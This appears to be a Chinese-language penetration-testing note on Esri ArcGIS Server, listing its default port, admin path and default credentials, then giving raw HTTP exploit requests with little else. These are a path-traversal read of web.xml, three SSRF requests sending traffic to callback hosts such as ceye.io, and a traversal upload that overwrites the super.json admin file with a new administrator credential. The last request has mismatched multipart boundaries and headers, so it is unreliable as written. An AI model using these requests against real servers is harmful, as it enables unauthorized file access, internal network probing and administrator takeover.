简介

ArcGIS 是由 Esri(Environmental Systems Research Institute)开发的地理信息系统(GIS)软件系列,广泛应用于地图制作、空间分析、数据管理和可视化等领域。ArcGIS 提供了一套完整的工具,帮助用户收集、管理、分析和展示地理信息。

image-20250211151754515

默认信息

  • 端口:6080
  • 后台地址:/arcgis/admin/
  • 后台密码:siteadmin/siteadmin

漏洞

任意文件读取

1
2
3
4
5
6
7
GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

回显ssrf-1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /arcgis/manager/proxy/gwproxy.jsp?http://631c122b.10p.xyz/c HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36
(KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im
age/apng,*/*q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0

回显ssrf-2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /arcgis/manager/proxy/proxy.jsp?http://xxxxxxx.ceye.io/xxxx HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36
(KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im
age/apng,*/*q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0

无回显ssrf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /arcgis/manager/proxy?http://xxxxxxx.ceye.io/xxxx HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36
(KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im
age/apng,*/*q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0

管理员密码重置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
POST /arcgis/rest/services/SampleWorldCities/FeatureServer/uploads/upload HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36
(KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im
age/apng,*/*q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0

------WebKitFormBoundary7s4MP8qFuXMFGC59
Content-Disposition:form-data;name="file";
filename="../../../../../../config-store/security/super/super.json"
Content-Type:image/png

{
"username":"siteadmin1",
"password":"uPwWtXKOCTk=",
"disabled":false,
"lockoutInfo":{
	"consecutiveLogonFailureAttempts":1,
	"firstLogonFailureTime":1690342933617,
	"lockedUntilTime":0
	}
}
-----WebKitFormBoundary7s4MP8qFuXMFGC59
Content-Disposition:form-data;name="description"

------WebKitFormBoundary7s4MP8qFuXMFGC59
Content-Disposition:form-data;name="f"

html
------WebkitFormBoundary7s4MP8qFuXMFGcso--